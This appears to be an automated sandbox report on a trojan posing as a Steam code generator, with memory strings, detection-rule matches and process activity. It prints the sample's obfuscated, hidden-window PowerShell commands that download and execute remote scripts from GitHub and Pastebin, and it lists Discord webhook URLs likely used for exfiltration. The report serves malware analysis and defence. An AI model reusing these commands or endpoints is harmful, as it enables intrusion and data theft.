Source: powershell.exe, 00000004.00000002.2376546046.000001662B951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39BCED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184123000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2376546046.000001662CDB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000006.00000002.2593081552.000001FB80224000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.2593081552.000001FB81F9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39D2B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://0.discor
Source: powershell.exe, 00000006.00000002.2593081552.000001FB81F9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39D2B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://0.discord.com/
Source: powershell.exe, 00000004.00000002.2376546046.000001662B951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39BD2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39BD17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D1840FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D1840E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.2657006446.000001FB9006F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.2657006446.000001FB9006F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.2657006446.000001FB9006F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000D.00000002.2798056511.000002B39D17E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185636000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.com
Source: powershell.exe, 00000006.00000002.2593081552.000001FB81F9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39D2B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.com/
Source: powershell.exe, 0000000D.00000002.2798056511.000002B39D17E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185636000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.com/api/webhooks/128545359042878
Source: powershell.exe, 0000000D.00000002.2798056511.000002B39C85F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ
Source: powershell.exe, 00000011.00000002.2874987774.000001D184C70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184B34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_
Source: powershell.exe, 00000006.00000002.2593081552.000001FB81649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB81E52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kN
Source: powershell.exe, 00000006.00000002.2593081552.000001FB81F9A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.p
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/B:
Source: powershell.exe, 00000006.00000002.2593081552.000001FB80224000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C729DC000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000003.2188026202.0000020C72AAD000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000003.2187911601.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A1C000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C729CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txt
Source: steamcodegenerator.exe String found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txt%pinvalid
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C729CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txtE
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C729DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txtF
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txtiR
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txtk
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C729DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txtl
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C729DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/user-attachments/files/17267811/stm.txtll
Source: powershell.exe, 00000006.00000002.2593081552.000001FB80FE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C1DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D18470A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.2392788423.000001663B9CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2392788423.000001663BB02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2376546046.000001662D22A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2657006446.000001FB901B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2657006446.000001FB9006F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: steamcodegenerator.exe, 00000000.00000003.2187911601.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A1C000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000003.2201099145.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000003.2201099145.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/2
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/GP
Source: steamcodegenerator.exe, 00000000.00000003.2201099145.0000020C72A62000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000003.2187911601.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398727720.0000020C74620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-repository-file-5c1aeb/867932512/17267811?X-
Source: steamcodegenerator.exe, 00000000.00000003.2187911601.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/t
Source: powershell.exe, 00000004.00000002.2376546046.000001662CDB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000004.00000002.2376546046.000001662CDB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: powershell.exe, 0000000D.00000002.2798056511.000002B39C738000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184B06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 0000000D.00000002.2798056511.000002B39C738000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C72E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184B06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184AFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000006.00000002.2593081552.000001FB815FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000006.00000002.2593081552.000001FB815FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C7F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184BC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000006.00000002.2593081552.000001FB81642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB803C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB81649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll
Source: powershell.exe, 00000006.00000002.2593081552.000001FB815FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB80391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt
Source: powershell.exe, 0000000D.00000002.2798056511.000002B39C76E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C74A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000006.00000002.2593081552.000001FB80391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.comp

System Summary

Source: amsi64_420.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
Source: amsi64_5576.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
Source: sslproxydump.pcap, type: PCAP | Matched rule: Windows_Trojan_Donutloader_f40e3759; Author: unknown
Source: 00000000.00000002.3398779479.0000020C74730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759; Author: unknown
Source: 00000000.00000003.2201099145.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759; Author: unknown
Source: 00000000.00000002.3398378656.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759; Author: unknown
Source: Process Memory Space: powershell.exe PID: 4372, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 420, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5576, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\stm[1].txt, type: DROPPED | Matched rule: Windows_Trojan_Donutloader_f40e3759; Author: unknown
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Code function: 0_2_0000020C7473819F NtCreateSection, NtMapViewOfSection, VirtualAlloc, NtUnmapViewOfSection, NtMapViewOfSection, VirtualProtect, VirtualProtect, VirtualProtect, 0_2_0000020C7473819F
Source: amsi64_420.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_5576.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: sslproxydump.pcap, type: PCAP | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.3398779479.0000020C74730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000003.2201099145.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.3398378656.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: Process Memory Space: powershell.exe PID: 4372, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 420, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5576, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\stm[1].txt, type: DROPPED | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engine | Classification label: mal96.troj.evad.winEXE@21/17@5/5
Source: C:\Users\user\Desktop\steamcodegenerator.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\stm[1].txt
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5396:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3640:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xys4rqtb.i0t.ps1
Source: steamcodegenerator.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: steamcodegenerator.exe | ReversingLabs: Detection: 42%
Source: unknown | Process created: C:\Users\user\Desktop\steamcodegenerator.exe "C:\Users\user\Desktop\steamcodegenerator.exe"
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
